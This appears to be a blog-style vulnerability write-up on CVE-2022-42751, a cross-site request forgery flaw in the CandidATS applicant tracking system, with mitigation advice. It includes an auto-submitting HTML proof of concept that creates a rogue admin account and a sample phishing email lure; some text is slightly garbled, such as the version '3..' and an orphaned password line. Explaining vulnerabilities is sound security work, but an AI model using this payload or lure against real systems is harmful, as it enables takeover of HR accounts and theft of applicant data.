CVE-2022-42751 - How a CSRF Vulnerability in CandidATS 3.. Lets Attackers Get Admin Access

CVE-2022-42751 affects CandidATS, an open-source applicant tracking system used by HR departments for managing job applications. This post will break down how an attacker can escalate privileges due to a CSRF problem in version 3.., what the impact is, demonstrate how the exploit works with code, and link you to the original advisories and resources.

What Is CVE-2022-42751?

CVE-2022-42751 is a Cross-Site Request Forgery (CSRF) vulnerability in CandidATS version 3... Because the application does not protect sensitive actions with anti-CSRF tokens, an outside attacker can trick an admin user into making changes (like creating a new admin account) without their knowledge.

Official CVE Entry
Packet Storm Advisory
Exploit DB

Why Is This Dangerous?

An attacker could send a crafted link or website to a logged-in CandidATS admin. If the admin clicks, the attacker's code silently creates a new admin user. The attacker can then log in with full rights—viewing, modifying, even deleting sensitive HR data.

1. No CSRF Protection

When the form to create a new user is submitted, CandidATS doesn’t check for any CSRF tokens. It just processes whatever data is sent. That’s a big problem for high-privilege actions.

2. Attacker Prepares Malicious HTML

The attacker makes a small web page with a hidden form or uses JavaScript to submit a cross-site request. Here’s what the attacker’s code might look like:

<!-- malicious.html -->
<html>
  <body>
    <form action="http://candidats.example.com/admin/adduser.php"; method="POST" id="csrfForm">
      <input type="hidden" name="username" value="eviladmin" />
      <input type="hidden" name="password" value="SuperStrongPass123" />
      <input type="hidden" name="email" value="attacker@example.com" />
      <input type="hidden" name="role" value="admin" />
      <!-- Set any required fields for admin creation -->
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
    <h2>If you see this, your HR system is vulnerable!</h2>
  </body>
</html>

3. Social Engineering

The attacker now just needs the victim admin to visit malicious.html while they're logged into CandidATS. For example, the attacker could send a phishing email:

> Hi,
> We received your resume submission. To see your candidate profile, click here.

When the admin opens the link, the browser sends the admin's cookies to candidats.example.com, and the form is processed as if the admin had filled it out themselves.

Password: SuperStrongPass123

If the application is still vulnerable, the login will work with full admin privileges.

How Can You Protect Against This?

- Patch: Check if there’s a fixed version of CandidATS (official site: https://candidats.org/)
- Use CSRF Tokens: Every form that performs sensitive actions should include a unique anti-CSRF token.

References

- CVE-2022-42751 @ NVD
- Exploit-DB: 51158
- Packet Storm Security CVE Advisory
- CandidATS GitHub

Conclusion

CVE-2022-42751 is simple but powerful. Any application managing sensitive data must use CSRF protection for high-privilege actions. If you run CandidATS 3.., patch immediately or restrict access to the admin panel—your data depends on it!

If you want hands-on help or have questions about securing your applicant tracking system, reach out to your IT team or relevant open-source community.

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:12:00 UTC